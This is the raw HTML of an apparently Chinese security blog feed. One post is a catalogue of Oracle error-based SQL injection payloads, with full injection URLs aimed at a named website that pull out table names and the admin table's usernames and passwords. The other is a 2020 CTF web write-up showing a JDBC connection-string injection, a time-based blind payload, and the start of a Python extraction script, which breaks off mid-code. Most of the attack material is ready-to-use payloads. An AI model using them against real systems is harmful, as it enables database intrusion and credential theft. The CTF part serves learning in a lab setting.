background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">bms_xdb_version.makeversioned</span>()进报错注入</span></p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">and&nbsp;(select&nbsp;dbms_xdb_version.makeversioned((select&nbsp;user&nbsp;from&nbsp;dual))&nbsp;from&nbsp;dual)&nbsp;is&nbsp;not&nbsp;null&nbsp;--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">dbms_xdb_version.uncheckout</span>()进行报错注入</span></p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">and&nbsp;(select&nbsp;dbms_xdb_version.uncheckout((select&nbsp;user&nbsp;from&nbsp;dual))&nbsp;from&nbsp;dual)&nbsp;is&nbsp;not&nbsp;null&nbsp;--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">&nbsp;</span></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">dbms_utility.sqlid_to_sqlhash</span>()进行报错注入</span></p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">and&nbsp;(SELECT&nbsp;dbms_utility.sqlid_to_sqlhash((select&nbsp;user&nbsp;from&nbsp;dual))&nbsp;from&nbsp;dual)&nbsp;is&nbsp;not&nbsp;null&nbsp;--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;">&nbsp;<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">ordsys.ord_dicom.getmappingxpath</span>()进行报错注入</span></p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">and&nbsp;1=ordsys.ord_dicom.getmappingxpath((select&nbsp;user&nbsp;from&nbsp;dual),user,user)--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">decode</span>进行报错注入</span></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">这种方式更偏向<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">布尔型注入</span>,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法。</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">and&nbsp;1=(select&nbsp;decode(substr(user,1,1),&#39;S&#39;,(1/0),0)&nbsp;from&nbsp;dual)&nbsp;--</pre></div><hr style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"/><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><div style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255); text-align: right;"><a href="https://www.cnblogs.com/-qing-/p/10949562.html#_labelTop" style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; text-decoration-line: none; color: rgb(102, 178, 255); transition: all 0.2s ease 0s;">回到顶部(go to top)</a><a name="_label2" style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: rgb(102, 178, 255); transition: all 0.2s ease 0s;"></a></div><h2 style="margin: 20px 0px 10px; padding: 0px; border-top: none; border-right: none; border-bottom: 1px solid rgb(238, 238, 238); border-left: none; border-image: initial; background-repeat: no-repeat; font-size: 28pt; line-height: 1.5; box-sizing: inherit; font-family: Calibri, &quot;Microsoft YaHei&quot;, &quot;Hiragino Sans GB&quot;, Arial, sans-serif; color: rgb(51, 51, 51); white-space: normal; background-color: rgb(255, 255, 255);">0x02&nbsp;报错函数注入数据</h2><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">Oracle 数据库的注入不同于其他数据库,如Access 和Mysql,它包含了几个<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">系统表</span>,这几个<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">系统表</span>里存储了系统数据库的表名和列名,如<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">user_tab_columns,all_tab_columns,all_tables,user_tables</span>&nbsp;系统表就存储了用户的所有的表、列名,其中<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">table_name</span>&nbsp;表示的是系统里的表名,<span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; color: #FF0000;">column_name</span>&nbsp;里的是系统里存在的列名</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">爆库&nbsp;第一行记录</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;1=utl_inaddr.get_host_name((select&nbsp;(SELECT&nbsp;DISTINCT&nbsp;owner&nbsp;FROM&nbsp;all_tables&nbsp;where&nbsp;rownum=1)&nbsp;from&nbsp;dual))--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139625139210.png" alt="" style="margin: 0px 0px 10px; padding: 0px; border: 0px; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; vertical-align: middle; height: auto; max-width: 100%; border-radius: 5px; box-shadow: rgba(0, 0, 2, 0.2) 0px 2px 2px;"/></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">爆表&nbsp;第一行第一个记录</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;1=utl_inaddr.get_host_name((select&nbsp;table_name&nbsp;from&nbsp;user_tables&nbsp;where&nbsp;rownum=1))&nbsp;--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139626815046.png" alt="" style="margin: 0px 0px 10px; padding: 0px; border: 0px; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; vertical-align: middle; height: auto; max-width: 100%; border-radius: 5px; box-shadow: rgba(0, 0, 2, 0.2) 0px 2px 2px;"/></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">第二个记录</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;1=utl_inaddr.get_host_name((select&nbsp;table_name&nbsp;from&nbsp;user_tables&nbsp;where&nbsp;rownum=1&nbsp;and&nbsp;table_name&nbsp;not&nbsp;in&nbsp;(&#39;LOGMNR_SESSION_EVOLVE$&#39;)))&nbsp;--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139629552020.png" alt="" style="margin: 0px 0px 10px; padding: 0px; border: 0px; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; vertical-align: middle; height: auto; max-width: 100%; border-radius: 5px; box-shadow: rgba(0, 0, 2, 0.2) 0px 2px 2px;"/></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">报错admin表的 用户和密码</p><div class="cnblogs_code" style="margin: 5px 0px; padding: 5px; border: 1px solid rgb(204, 204, 204); background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; background-color: rgb(245, 245, 245); overflow: auto; white-space: normal; font-size: 12px !important; font-family: &quot;Courier New&quot; !important;"><pre style="margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; background-repeat: no-repeat; line-height: inherit; box-sizing: inherit; white-space: pre-wrap; overflow-wrap: break-word; font-family: &quot;Courier New&quot; !important;">http://www.jsporcle.com/news.jsp?id=1&nbsp;and&nbsp;1=utl_inaddr.get_host_name((select&nbsp;(select&nbsp;username%7c%7cpassword&nbsp;from&nbsp;admin)from&nbsp;dual))--</pre></div><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><img src="http://www.liugongrui.com/zb_users/upload/2020/05/1590139629866886.png" alt="" style="margin: 0px 0px 10px; padding: 0px; border: 0px; background-repeat: no-repeat; font-size: inherit; line-height: inherit; box-sizing: inherit; vertical-align: middle; height: auto; max-width: 100%; border-radius: 5px; box-shadow: rgba(0, 0, 2, 0.2) 0px 2px 2px;"/></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);"><span style="margin: 0px; padding: 0px; border: none; background-repeat: no-repeat; font-size: 14pt; line-height: inherit; box-sizing: inherit;">&nbsp;其他报错函数大同小异。</span></p><p style="margin: 10px auto; padding: 0px; border: none; background-repeat: no-repeat; font-size: medium; line-height: inherit; box-sizing: inherit; color: rgb(51, 51, 51); font-family: &quot;Helvetica Neue&quot;, Helvetica, &quot;Microsoft Yahei&quot;, &quot;Hiragino Sans GB&quot;, &quot;Source Han Sans&quot;, &quot;PingFang SC&quot;, Arial, &quot;Heiti SC&quot;, &quot;WenQuanYi Micro Hei&quot;, sans-serif; white-space: normal; background-color: rgb(255, 255, 255);">&nbsp;</p><p><br/></p>Fri, 22 May 2020 17:26:30 +08002020网鼎杯 第三组 Web Think_java WriteUp(java反序列化,sql盲注,swagger)http://www.liugongrui.com/?id=259<p>打开页面是这样的<br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589811653473281.png" alt="image.png"/></p><p>通过给的附件进行代码审计,发现有sql注入漏洞<br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589811754727603.png" alt="image.png"/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589811724897752.png" alt="image.png"/></p><p><br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589811741124792.png" alt="image.png"/></p><p>注入点为dbName参数,首先需要解决的问题是如何绕过&nbsp;</p><p>&quot;jdbc:mysql://mysqldbserver:3306/&quot; + dbName;</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589811839265577.png" alt="image.png"/></p><p>找到jdbc的连接字符串参数文档,发现dbName后面加上?后面可以加任意参数,就不会影响正常的数据库连接</p><p><br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589811908324415.png" alt="image.png"/></p><p>也就是说dbName可以等于myapp?a=1.....&nbsp; ,a=1 后面可以写单引号来注入了,经过测试找到注入点</p><pre class="prism-highlight prism-language-sql">myapp?a=1&#39;&nbsp;or&nbsp;(table_schema=&#39;myapp&#39;&nbsp;and&nbsp;if(ascii(substr((select&nbsp;pwd&nbsp;from&nbsp;user&nbsp;limit&nbsp;0,1),1,1))=97,sleep(5),1))#</pre><p>盲注代码</p><pre class="prism-highlight prism-language-python">import&nbsp;requests def&nbsp;data(): &nbsp;&nbsp;&nbsp;&nbsp;db&nbsp;=&nbsp;{} &nbsp;&nbsp;&nbsp;&nbsp;x&nbsp;=&nbsp;0 &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;x&nbsp;&lt;&nbsp;60: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x&nbsp;=&nbsp;x&nbsp;+&nbsp;1 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;x &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;i&nbsp;in&nbsp;range(33,&nbsp;128): &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;url&nbsp;=&nbsp;&#39;http://19bb72dc-c2d2-4b7c-81b6-da4934ff6755.node3.buuoj.cn/common/test/sqlDict&#39; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;data&nbsp;=&nbsp;{ 